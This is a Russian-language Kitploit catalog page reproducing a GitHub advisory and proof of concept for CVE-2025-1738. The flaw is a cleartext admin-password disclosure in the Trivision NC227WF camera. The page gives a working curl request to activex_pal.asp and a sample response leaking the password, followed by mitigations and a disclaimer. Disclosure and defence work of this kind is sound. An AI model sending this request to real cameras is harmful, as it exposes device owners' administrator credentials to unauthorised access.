Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-1738 — 0day обнаружение CVE-2025-1738 | Kitploit
Инструменты/GitHubGitHub/n0n4m3x41/cve-2025-1738
Безопасность IoTАтаки на ПаролиАнализ уязвимостейЭксплуатацияБезопасность оборудования и IoTОбучение и Образование
GitHubn0n4m3x41/cve-2025-1738

CVE-2025-1738

0day обнаружение CVE-2025-1738

Репозиторий
35 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-1738 - PoC для камеры Trivision NC227WF

📋 Обзор

В рамках ответственного раскрытия были назначены два официальных CVE.

CVECVSS v3.1ОценкаCWEТип
CVE-2025-1738AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N6.2CWE-598Раскрытие пароля в открытом виде

🔍 CVE-2025-1738 — Раскрытие пароля в открытом виде (CWE-598)

Описание

Любой локальный пользователь может получить пароль администратора в открытом виде без предварительной аутентификации.

  • Вектор атаки: Локальный (AV:L)
  • Оценка CVSS: 6.2
  • CWE: CWE-598 (Использование метода GET-запроса с конфиденциальными строками запроса)

Полезная нагрузка

root@kitploit:~
curl -u admin:whatever http://<CAMERA_IP>:<PORT> --request-target en/player/activex_pal.asp

Пример ответа

изображение
root@kitploit:~
...password=unguessable123!...

Пароль администратора возвращается в открытом виде в теле ответа.


🛡️ Смягчение

  • Обновите прошивку, если доступна исправленная версия от Trivision.
  • Изолируйте камеру в выделенной VLAN без внешнего доступа.
  • Заблокируйте управляющий порт камеры с помощью брандмауэра от ненадежных сегментов сети.
  • Измените учетные данные по умолчанию и регулярно обновляйте пароли.
  • Отслеживайте неожиданный доступ к activex_pal.asp и mblogin.asp.

📚 Ссылки

  • NVD — CVE-2025-1738
  • NVD — CVE-2025-1739

⚖️ Отказ от ответственности

Этот репозиторий предназначен только для образовательных целей и авторизованных исследований безопасности. Авторы не несут ответственности за любое неправомерное использование. Всегда получайте явное разрешение перед тестированием любого устройства.

Скачать инструмент